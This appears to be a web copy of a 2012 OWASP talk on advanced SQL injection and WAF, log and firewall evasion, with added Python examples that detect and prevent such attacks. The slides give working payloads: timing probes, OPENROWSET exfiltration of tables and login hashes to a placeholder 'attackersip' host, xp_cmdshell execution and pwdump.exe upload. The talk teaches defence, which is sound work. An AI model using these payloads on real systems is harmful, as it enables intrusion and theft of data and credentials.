Advanced SQLi and Evasion Techniques
About Me

Introduction
Damian Profancik | Technical Lead/Security Services Leader @ Apparatus, CISSP
dprofancik@gmail.com
@integrisec
Credit
Cesar Cerrudo – CTO, IOActive Labs
   o http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injection.pdf

ModSecurity Team – Trustwave SpiderLabs
   o http://blog.spiderlabs.com/2011/07/modsecurity-sql-injection-challenge-lessons-learned.html

Avi Douglen – OWASP Board Member, Israel
   o http://www.comsecglobal.com/framework/Upload/SQL_Smuggling.pdf
SQL Injection Basics
• Dynamic construction of SQL queries
   "SELECT * FROM table WHERE user = '" + uname + "' AND pwd = '" + pword + "'"

• Unsanitized user input
   uname = ' or 1=1--  =>  SELECT * FROM table WHERE user = '' or 1=1--' AND pwd = ''

• Excessive permission
    o Web services running as privileged user with db_owner rights
    o Connecting to database using sa, dbo, or sysadmin accounts
    o Lax file system permissions
Advanced SQLi Techniques
•   Blind SQL Injection
•   Data Exfiltration
•   Privilege Escalation
•   Command Execution
•   Uploading Files
•   Internal DB Server Exploration
•   Port Scanning
•   Firewall Evasion
•   Log Evasion
•   WAF Evasion
Blind SQL Injection
Blind SQL Injection
•   Differential Analysis

    Example:
     http://www.someforum.com/posts.php?id=2
          SELECT author, title, body FROM posts WHERE ID = 2


     http://www.someforum.com/posts.php?id=2 and 1=2
          SELECT author, title, body FROM posts WHERE ID = 2 and 1=2


     http://www.someforum.com/posts.php?id=2 and 1=1
          SELECT author, title, body FROM posts WHERE ID = 2 and 1=1
Blind SQL Injection (cont.)
•   Database Management System Fingerprinting
     o   System Functions
           •   MS SQL Server = getdate()
           •   MySQL = now()
           •   Oracle = sysdate()
           •   Example: http://www.someforum.com/posts.php?id=2 and getdate()=getdate()

     o   String Concatenation
           •   MS SQL Server = +
           •   MySQL = +, CONCAT()
           •   Oracle = ||, CONCAT()
           •   Example: http://www.someforum.com/posts.php?id=2 and 'test'='te'+'st'

     o   Query Chaining
           •   MS SQL Server, MySQL = allows chaining with semicolon
           •   Oracle = does NOT allow chaining with semicolon
           •   Example: http://www.someforum.com/posts.php?id=2; commit --
Blind SQL Injection (cont.)
•   Timing Attacks
     o   Adding delay
           •   SQL Server = WAITFOR DELAY '0:0:10'
           •   MySQL = BENCHMARK(10000000,ENCODE('MSG','by 10 seconds'))
           •   PostgreSQL = pg_sleep(10)
           •   Oracle = Union with query that contains a lot of results
     o   SELECT IF(condition, true, false)

    Example:
    …1 UNION SELECT IF(SUBSTRING(password,1,1) = CHAR(50),BENCHMARK(10000000,ENCODE('MSG','by 10 seconds')),null) FROM users WHERE userid = 1;
Attacking MS SQL Server
Linked and Remote Servers
•   OPENROWSET

    Example:
    SELECT * FROM OPENROWSET( 'SQLOLEDB',
                               'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
                               'SELECT * FROM table' )


•   OPENDATASOURCE

    Example:
    SELECT * FROM OPENDATASOURCE( 'SQLOLEDB',
                               'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;' )
                               .DatabaseName.dbo.TableName
Data Exfiltration
•   Remote server INSERT

    Example:
    INSERT INTO OPENROWSET('SQLOLEDB',
                               'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
                               'SELECT * FROM table1')
                               SELECT * FROM table2
Data Exfiltration (cont.)
  INSERT INTO OPENROWSET('SQLOLEDB',
                               'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
                               'SELECT * FROM _sysdatabases')
                               SELECT * FROM master.dbo.sysdatabases


  INSERT INTO OPENROWSET('SQLOLEDB',
                               'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
                               'SELECT * FROM _sysobjects ')
                               SELECT * FROM databasename.dbo.sysobjects


  INSERT INTO OPENROWSET('SQLOLEDB',
                               'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
                               'SELECT * FROM _syscolumns')
                               SELECT * FROM databasename.dbo.syscolumns
Data Exfiltration (cont.)
  INSERT INTO OPENROWSET('SQLOLEDB',
                               'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
                               'SELECT * FROM table1')
                               SELECT * FROM databasename..table1


  INSERT INTO OPENROWSET('SQLOLEDB',
                               'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
                               'SELECT * FROM table2')
                               SELECT * FROM databasename..table2


  INSERT INTO OPENROWSET('SQLOLEDB',
                               'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
                               'SELECT * FROM _sysxlogins')
                               SELECT * FROM databasename.dbo.sysxlogins
Privilege Escalation
•   Known vulnerabilities

    Example:
    SQL injection vulnerability in the RESTORE DATABASE command that can lead to privilege escalation
    Team SHATTER - 4/12/2012 - http://packetstormsecurity.org/files/111788/shatter-sqlserver.txt


•   Often not required
    o   Connection strings using SA, dbo, sysadmin
    o   Web service context
Command Execution
 Example:
 INSERT INTO OPENROWSET('SQLOLEDB',
                            'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
                            'SELECT * FROM temp_table')
                            EXEC master.dbo.xp_cmdshell 'dir'
Uploading Files
On attacker’s server…
1.   CREATE TABLE AttackerTable (data text)

2.   BULK INSERT AttackerTable FROM 'pwdump.exe' WITH (codepage='RAW')

On victim’s server…
3.   EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersIP -Usa -Ppwn3d'

4.   EXEC xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo','AttackersAlias','REG_SZ','DBMSSOCN,AttackersIP,80'

5.   EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersAlias -Usa -Ppwn3d'
Uploading Files (cont.)
  INSERT INTO OPENROWSET('SQLOLEDB',
                             'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
                             'SELECT * FROM temp_table')
                             EXEC xp_cmdshell '"first script line" >> script.vbs'


                             …
                             EXEC xp_cmdshell '"second script line" >> script.vbs'
                             ...
                             EXEC xp_cmdshell '"last script line" >> script.vbs'
                             EXEC xp_cmdshell 'script.vbs' ==> execute script to download binary
Internal DB Server Exploration
•    Linked and Remote Servers

1.   INSERT INTO OPENROWSET('SQLOLEDB',
                                     'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
                                     'SELECT * FROM _sysservers')
                                      SELECT * FROM master.dbo.sysservers

2.   INSERT INTO OPENROWSET('SQLOLEDB',
                                     'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
                                     'SELECT * FROM _sysservers')
                                      SELECT * FROM linkedserver1.master.dbo.sysservers

3.   INSERT INTO OPENROWSET('SQLOLEDB',
                                     'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
                                     'SELECT * FROM _sysdatabases')
                                      SELECT * FROM linkedserver1.master.dbo.sysdatabases
4.   Rinse and repeat…
Port Scanning
  Example:
  SELECT * FROM OPENROWSET('SQLOLEDB',
                            'uid=sa;pwd=;Network=DBMSSOCN;Address=192.168.1.1,80;timeout=5',
                            'SELECT * FROM table')
Evasion Techniques
Firewall Evasion
•   Use port 80 for outbound

    Example:
    INSERT INTO OPENROWSET('SQLOLEDB',
                               'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,80;',
                               'SELECT * FROM table1')
                               SELECT * FROM table2
Log Evasion
•   Inject using POST parameters


•   Long HTTP requests
     o   IIS truncates requests longer than 4097 characters
     o   Sun-One Application Server truncates at 4092 characters


     Example:
     http://www.someforum.com/posts.php?param=<4097 x 'a'>&id=2 or 1=1--
WAF Evasion
•   Comments
     o   # = single line comment
     o   -- = single line comment
     o   /* */ = inline, multi-line comment
     o   /*! */ = MySQL-specific inline, multi-line comment

    Example:
     http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…


•   New line
     o   %0D%0A = URL-encoded newline
     o   %0B = URL-encoded vertical tab

    Example:
     http://www.someforum.com/posts.php?id=2 UNION%0D%0ASELECT * FROM…
WAF Evasion (cont.)
•   Character Encoding
     o   Unicode (U+02BC = ʼ)
     o   CHAR()
     o   Hexadecimal
     o   URL-encoding
     o   Double Encoding


    Example:
     Double Encoding (the WAF inspects the value after one decode; the application decodes it a second time):
           URL    = http://www.someforum.com/posts.php?id=2 UN%252f%252a%252a%252fION SEL%252f%252a%252a%252fECT * FROM…
           WAF    = http://www.someforum.com/posts.php?id=2 UN%2f%2a%2a%2fION SEL%2f%2a%2a%2fECT * FROM…
           Result = http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM…
WAF Evasion (cont.)
•   Concatenation
     o   EXEC()
     o   Split/Join
     o   Special Characters (e.g. '*', '+', '%', etc.)

    Example:
     Split/Join:
            URL = http://www.someforum.com/posts.php?id=SELECT name&id=password FROM users
            WAF = id=SELECT name
                   id=password FROM users
            ASP/ASP.Net = id=SELECT name,password FROM users

     Special Characters:
           URL = http://www.someforum.com/posts.php?id=SEL%ECT name,password FR%OM users
           WAF = id=SEL%ECT name,password FR%OM users
           ASP/ASP.Net = id=SELECT name,password FROM users
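Added example, not part of the deck: a normalization pass that a filter or log analyser should run before pattern matching, covering the inline-comment, encoded-newline, double-encoding, split/join and stray-'%' cases from the WAF Evasion slides and the "or 1=1" form from the Log Evasion slide. The request URLs are constructed from the slides' examples; the detection patterns are illustrative, and duplicate parameters are comma-joined as the Split/Join slide says ASP/ASP.Net does.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed requests modelled on the WAF Evasion slides: inline comments,
# an encoded newline, double encoding, a split/join parameter, a stray '%',
# plus the "or 1=1" form from the Log Evasion slide and one benign request.
SAMPLE_URLS = [
    "http://www.someforum.com/posts.php?id=2 UN/**/ION SEL/**/ECT * FROM posts",
    "http://www.someforum.com/posts.php?id=2 UNION%0D%0ASELECT * FROM posts",
    "http://www.someforum.com/posts.php?id=2 UN%252f%252a%252a%252fION SEL%252f%252a%252a%252fECT * FROM posts",
    "http://www.someforum.com/posts.php?id=SELECT name&id=password FR%OM users",
    "http://www.someforum.com/posts.php?id=2 or 1=1--",
    "http://www.someforum.com/posts.php?id=2",
]

MAX_DECODE_ROUNDS = 3  # bounded: each pass undoes one layer of %-encoding


def canonicalize(value: str) -> str:
    """Reduce a parameter value to the form the back end is likely to see."""
    # 1. Undo layered URL encoding (double encoding) until the value is stable.
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    # 2. Drop a '%' not followed by two hex digits, as a platform that silently
    #    discards it would (FR%OM -> FROM on the Concatenation slide).
    value = re.sub(r"%(?![0-9A-Fa-f]{2})", "", value)
    # 3. Keep the body of MySQL /*! ... */ comments (it is executed), then remove
    #    ordinary /* ... */ comments used to split keywords (UN/**/ION).
    value = re.sub(r"/\*!(.*?)\*/", r"\1", value, flags=re.S)
    value = re.sub(r"/\*.*?\*/", "", value, flags=re.S)
    # 4. Collapse CR, LF, vertical tab (%0B) and other whitespace runs; \s
    #    covers all of them in Python's re module.
    value = re.sub(r"\s+", " ", value)
    return value.strip().upper()


def effective_parameters(url: str) -> dict:
    """Merge duplicate query parameters comma-joined, the way the Split/Join
    slide says ASP/ASP.Net does, so the payload is inspected as one value."""
    merged: dict = {}
    for key, val in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        merged.setdefault(key, []).append(val)
    return {key: canonicalize(",".join(vals)) for key, vals in merged.items()}


# Illustrative patterns only; a production rule set is far larger.
SQLI_PATTERNS = [
    re.compile(r"\bUNION\b.*\bSELECT\b"),
    re.compile(r"\bSELECT\b.+\bFROM\b"),
    re.compile(r"\bOR\b\s+\d+\s*=\s*\d+"),
]


def flag_request(url: str) -> list:
    """Names of the parameters whose canonical value matches a pattern."""
    return sorted(
        key for key, val in effective_parameters(url).items()
        if any(p.search(val) for p in SQLI_PATTERNS)
    )


if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(flag_request(url) or "clean", "<-", effective_parameters(url))
```

Matching against the raw request would miss every one of the first five URLs; matching against the canonical form catches them all.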
SQL Injection Prevention
SQLi Prevention
•   Sanitize User Input
     o   Normalize Input
     o   Whitelists
     o   Built-in Functions
     o   Regular Expressions
     o   Trust NO data source (e.g. Cookies, Referer, User-Agent, etc.)
•   Prepared Statements/Parameterized Queries
•   Stored Procedures
•   Accounts with Least Privilege
•   Enable DisallowAdhocAccess registry setting for MS SQL Server
•   Perform Self Assessments
•   Use a Web Application Firewall
•   Filter Outbound Traffic at Firewall
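Added example, not part of the deck: the dynamic query from the SQL Injection Basics slide beside the parameterized form this slide recommends, plus an allowlist for an identifier that cannot be bound as a parameter (the Whitelists bullet). It uses Python's sqlite3 with a constructed in-memory users table; the table, columns and rows are assumptions.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the application database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, pwd TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def login_dynamic(conn: sqlite3.Connection, uname: str, pword: str) -> list:
    """Vulnerable form from the Basics slide: the query text is built by
    concatenation, so ' or 1=1-- rewrites the WHERE clause and comments out
    the password check."""
    sql = ("SELECT user, role FROM users WHERE user = '" + uname
           + "' AND pwd = '" + pword + "'")
    return conn.execute(sql).fetchall()


def login_parameterized(conn: sqlite3.Connection, uname: str, pword: str) -> list:
    """Hardened form: the statement shape is fixed and the driver binds the
    values, so the same input is compared as a literal user name."""
    sql = "SELECT user, role FROM users WHERE user = ? AND pwd = ?"
    return conn.execute(sql, (uname, pword)).fetchall()


# Identifiers (table or column names, ORDER BY targets) cannot be bound as
# parameters; this is where the Whitelists bullet applies.
ALLOWED_SORT_COLUMNS = {"user", "role"}


def list_users(conn: sqlite3.Connection, sort_by: str) -> list:
    """Only a value from the allowlist ever reaches the query text."""
    if sort_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unsupported sort column: {sort_by!r}")
    return conn.execute(f"SELECT user FROM users ORDER BY {sort_by}").fetchall()


if __name__ == "__main__":
    db = build_db()
    payload = "' or 1=1--"
    print("dynamic:      ", login_dynamic(db, payload, "x"))        # every row
    print("parameterized:", login_parameterized(db, payload, "x"))  # no rows
    print("allowlisted:  ", list_users(db, "role"))
```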
Q&A

 
Generative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to ProductionGenerative AI Deep Dive: Advancing from Proof of Concept to Production
Generative AI Deep Dive: Advancing from Proof of Concept to Production
 
20240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 202420240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 2024
 
How to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For FlutterHow to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For Flutter
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
 
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
 
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
GraphSummit Singapore | Enhancing Changi Airport Group's Passenger Experience...
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
 
Full-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalizationFull-RAG: A modern architecture for hyper-personalization
Full-RAG: A modern architecture for hyper-personalization
 
Microsoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdfMicrosoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdf
 
20 Comprehensive Checklist of Designing and Developing a Website
20 Comprehensive Checklist of Designing and Developing a Website20 Comprehensive Checklist of Designing and Developing a Website
20 Comprehensive Checklist of Designing and Developing a Website
 
Introducing Milvus Lite: Easy-to-Install, Easy-to-Use vector database for you...
Introducing Milvus Lite: Easy-to-Install, Easy-to-Use vector database for you...Introducing Milvus Lite: Easy-to-Install, Easy-to-Use vector database for you...
Introducing Milvus Lite: Easy-to-Install, Easy-to-Use vector database for you...
 
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
 
Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1Communications Mining Series - Zero to Hero - Session 1
Communications Mining Series - Zero to Hero - Session 1
 
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
 
Data structures and Algorithms in Python.pdf
Data structures and Algorithms in Python.pdfData structures and Algorithms in Python.pdf
Data structures and Algorithms in Python.pdf
 

Owasp Indy Q2 2012 Advanced SQLi

  • 1. Advanced SQLi and Evasion Techniques
  • 2. About Me
        Introduction
        Damian Profancik | Technical Lead/Security Services Leader @ Apparatus, CISSP
        dprofancik@gmail.com
        @integrisec
  • 3. Credit
        Cesar Cerrudo – CTO, IOActive Labs
           o http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injection.pdf
        ModSecurity Team – Trustwave SpiderLabs
           o http://blog.spiderlabs.com/2011/07/modsecurity-sql-injection-challenge-lessons-learned.html
        Avi Douglen – OWASP Board Member, Israel
           o http://www.comsecglobal.com/framework/Upload/SQL_Smuggling.pdf
  • 4. SQL Injection Basics
        • Dynamic construction of SQL queries
            "SELECT * FROM table WHERE user = '" + uname + "' AND pwd = '" + pword + "'"
        • Unsanitized user input
            uname = ' or 1=1--  =>  SELECT * FROM table WHERE user = '' or 1=1-- ' AND pwd = ''
        • Excessive permission
            o Web services running as privileged user with db_owner rights
            o Connecting to database using sa, dbo, or sysadmin accounts
            o Lax file system permissions
  • 9. Advanced SQLi Techniques
        • Blind SQL Injection
        • Data Exfiltration
        • Privilege Escalation
        • Command Execution
        • Uploading Files
        • Internal DB Server Exploration
        • Port Scanning
        • Firewall Evasion
        • Log Evasion
        • WAF Evasion
  • 11. Blind SQL Injection
        • Differential Analysis
            Example:
              http://www.someforum.com/posts.php?id=2
                  SELECT author, title, body FROM posts WHERE ID = 2
              http://www.someforum.com/posts.php?id=2 and 1=2
                  SELECT author, title, body FROM posts WHERE ID = 2 and 1=2
              http://www.someforum.com/posts.php?id=2 and 1=1
                  SELECT author, title, body FROM posts WHERE ID = 2 and 1=1
  • 12. Blind SQL Injection (cont.)
        • Database Management System Fingerprinting
            o System Functions
                • MS SQL Server = getdate()
                • MySQL = now()
                • Oracle = sysdate()
                • Example: http://www.someforum.com/posts.php?id=2 and getdate()=getdate()
            o String Concatenation
                • MS SQL Server = +
                • MySQL = +, CONCAT()
                • Oracle = ||, CONCAT()
                • Example: http://www.someforum.com/posts.php?id=2 and 'test'='te'+'st'
            o Query Chaining
                • MS SQL Server, MySQL = allows chaining with semicolon
                • Oracle = does NOT allow chaining with semicolon
                • Example: http://www.someforum.com/posts.php?id=2; commit --
  • 13. Blind SQL Injection (cont.)
        • Timing Attacks
            o Adding delay
                • SQL Server = WAITFOR DELAY '0:0:10'
                • MySQL = BENCHMARK(10000000,ENCODE('MSG','by 10 seconds'))
                • PostgreSQL = pg_sleep(10)
                • Oracle = Union with query that contains a lot of results
            o SELECT IF(condition, true, false)
                Example: …1 UNION SELECT IF(SUBSTRING(password,1,1) = CHAR(50),BENCHMARK(10000000,ENCODE('MSG','by 10 seconds')),null) FROM users WHERE userid = 1;
  • 15. Linked and Remote Servers
        • OPENROWSET
            Example:
              SELECT * FROM OPENROWSET('SQLOLEDB',
                'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
                'SELECT * FROM table')
        • OPENDATASOURCE
            Example:
              SELECT * FROM OPENDATASOURCE('SQLOLEDB',
                'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;'
              ).DatabaseName.dbo.TableName
  • 16. Data Exfiltration
        • Remote server INSERT
            Example:
              INSERT INTO OPENROWSET('SQLOLEDB',
                'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
                'SELECT * FROM table1')
              SELECT * FROM table2
  • 17. Data Exfiltration (cont.)
        INSERT INTO OPENROWSET('SQLOLEDB',
          'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
          'SELECT * FROM _sysdatabases')
        SELECT * FROM master.dbo.sysdatabases

        INSERT INTO OPENROWSET('SQLOLEDB',
          'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
          'SELECT * FROM _sysobjects')
        SELECT * FROM databasename.dbo.sysobjects

        INSERT INTO OPENROWSET('SQLOLEDB',
          'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
          'SELECT * FROM _syscolumns')
        SELECT * FROM databasename.dbo.syscolumns
  • 18. Data Exfiltration (cont.)
        INSERT INTO OPENROWSET('SQLOLEDB',
          'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
          'SELECT * FROM table1')
        SELECT * FROM databasename..table1

        INSERT INTO OPENROWSET('SQLOLEDB',
          'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
          'SELECT * FROM table2')
        SELECT * FROM databasename..table2

        INSERT INTO OPENROWSET('SQLOLEDB',
          'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
          'SELECT * FROM _sysxlogins')
        SELECT * FROM databasename.dbo.sysxlogins
  • 19. Privilege Escalation
        • Known vulnerabilities
            Example: SQL injection vulnerability in the RESTORE DATABASE command that can lead to privilege escalation
              Team SHATTER - 4/12/2012 - http://packetstormsecurity.org/files/111788/shatter-sqlserver.txt
        • Often not required
            o Connection strings using SA, dbo, sysadmin
            o Web service context
  • 20. Command Execution
        Example:
          INSERT INTO OPENROWSET('SQLOLEDB',
            'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
            'SELECT * FROM temp_table')
          EXEC master.dbo.xp_cmdshell 'dir'
  • 21. Uploading Files
        On attacker's server…
        1. CREATE TABLE AttackerTable (data text)
        2. BULK INSERT AttackerTable FROM 'pwdump.exe' WITH (codepage='RAW')
        On victim's server…
        3. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersIP -Usa -Ppwn3d'
        4. EXEC xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo','AttackersAlias','REG_SZ','DBMSSOCN,AttackersIP,80'
        5. EXEC xp_cmdshell 'bcp "SELECT * FROM AttackerTable" queryout pwdump.exe -c -Craw -SAttackersAlias -Usa -Ppwn3d'
  • 22. Uploading Files (cont.)
        INSERT INTO OPENROWSET('SQLOLEDB',
          'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
          'SELECT * FROM temp_table')
        EXEC xp_cmdshell '"first script line" >> script.vbs'
        …
        EXEC xp_cmdshell '"second script line" >> script.vbs'
        ...
        EXEC xp_cmdshell '"last script line" >> script.vbs'
        EXEC xp_cmdshell 'script.vbs'  ==> execute script to download binary
  • 23. Internal DB Server Exploration
        • Linked and Remote Servers
            1. INSERT INTO OPENROWSET('SQLOLEDB',
                 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
                 'SELECT * FROM _sysservers')
               SELECT * FROM master.dbo.sysservers
            2. INSERT INTO OPENROWSET('SQLOLEDB',
                 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
                 'SELECT * FROM _sysservers')
               SELECT * FROM linkedserver1.master.dbo.sysservers
            3. INSERT INTO OPENROWSET('SQLOLEDB',
                 'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;',
                 'SELECT * FROM _sysdatabases')
               SELECT * FROM linkedserver1.master.dbo.sysdatabases
            4. Rinse and repeat…
  • 24. Port Scanning
        Example:
          SELECT * FROM OPENROWSET('SQLOLEDB',
            'uid=sa;pwd=;Network=DBMSSOCN;Address=192.168.1.1,80;timeout=5',
            'SELECT * FROM table')
  • 26. Firewall Evasion
        • Use port 80 for outbound
            Example:
              INSERT INTO OPENROWSET('SQLOLEDB',
                'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,80;',
                'SELECT * FROM table1')
              SELECT * FROM table2
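Slides 15 through 26 all ride on OPENROWSET/OPENDATASOURCE provider strings and on xp_cmdshell. The Python below is an added example (not code from the talk, from Microsoft, or from any tool the talk names) of what a defender can pull out of captured T-SQL, for instance statements collected with SQL Server Audit or Extended Events: it parses the provider string to recover the destination host, port and login, and flags embedded credentials, non-default ports (the port-80 trick of slide 26) and the extended stored procedures the talk relies on. The sample statements are lifted from the slides; `attackersip` is the talk's own placeholder host.

```python
"""Audit captured T-SQL for ad hoc remote queries and command execution.
Added example, not code from the talk or from Microsoft. Input statements
are the talk's own examples; 'attackersip' is the talk's placeholder host."""
import re

DEFAULT_SQL_PORT = 1433

# OPENROWSET('provider', 'provider string', ...) / OPENDATASOURCE('provider', 'provider string')
PROVIDER_CALL_RE = re.compile(
    r"\b(OPENROWSET|OPENDATASOURCE)\s*\(\s*'[^']*'\s*,\s*'(?P<conn>[^']*)'", re.I)
# Extended procedures the talk uses for command execution and registry writes.
DANGEROUS_PROC_RE = re.compile(r"\b(xp_cmdshell|xp_regwrite)\b", re.I)
BCP_RE = re.compile(r"\bbcp\b", re.I)

# Constructed corpus: statements taken from slides 11, 20, 24 and 26.
SAMPLES = {
    "benign": "SELECT author, title, body FROM posts WHERE ID = 2",
    "exfil_port80": "INSERT INTO OPENROWSET('SQLOLEDB', "
                    "'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,80;', "
                    "'SELECT * FROM table1') SELECT * FROM table2",
    "cmd_exec": "INSERT INTO OPENROWSET('SQLOLEDB', "
                "'uid=sa;pwd=pwn3d;Network=DBMSSOCN;Address=attackersip,1433;', "
                "'SELECT * FROM temp_table') EXEC master.dbo.xp_cmdshell 'dir'",
    "port_scan": "SELECT * FROM OPENROWSET('SQLOLEDB', "
                 "'uid=sa;pwd=;Network=DBMSSOCN;Address=192.168.1.1,80;timeout=5', "
                 "'SELECT * FROM table')",
}


def parse_provider_string(conn: str) -> dict:
    """Break 'k=v;k=v' into the fields that matter: login, whether a password
    is embedded, and the Address=host,port destination (port defaults to 1433)."""
    parts = {}
    for kv in conn.split(";"):
        if "=" in kv:
            key, value = kv.split("=", 1)
            parts[key.strip().lower()] = value.strip()
    host, _, port = parts.get("address", "").partition(",")
    return {
        "uid": parts.get("uid"),
        "has_password": bool(parts.get("pwd")),
        "host": host,
        "port": int(port) if port.isdigit() else DEFAULT_SQL_PORT,
    }


def audit_statement(sql: str) -> list:
    """Return human-readable findings for one statement; empty if nothing stands out."""
    findings = []
    for m in PROVIDER_CALL_RE.finditer(sql):
        info = parse_provider_string(m.group("conn"))
        findings.append(f"{m.group(1).upper()} to {info['host']}:{info['port']} as {info['uid']}")
        if info["has_password"]:
            findings.append("credentials embedded in provider string")
        if info["port"] != DEFAULT_SQL_PORT:
            findings.append(f"non-default port {info['port']} (compare with egress firewall rules)")
    for m in DANGEROUS_PROC_RE.finditer(sql):
        findings.append(f"extended procedure {m.group(1).lower()} invoked")
    if BCP_RE.search(sql):
        findings.append("bcp invoked (bulk copy to or from another host)")
    return findings


if __name__ == "__main__":
    for name, sql in SAMPLES.items():
        print(name, "->", audit_statement(sql) or "clean")
```

The destination host and port are the fields worth correlating with egress firewall logs: an OPENROWSET that points at an address outside the database tier, or at port 80, is the pattern slides 16 through 26 describe, and the `DisallowAdhocAccess` setting from slide 33 is what removes the capability altogether.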
  • 27. Log Evasion
        • Inject using POST parameters
        • Long HTTP requests
            o IIS truncates requests longer than 4097 characters
            o Sun-One Application Server truncates at 4092 characters
            Example: http://www.someforum.com/posts.php?param=<4097 x 'a'>&id=2 or 1=1--
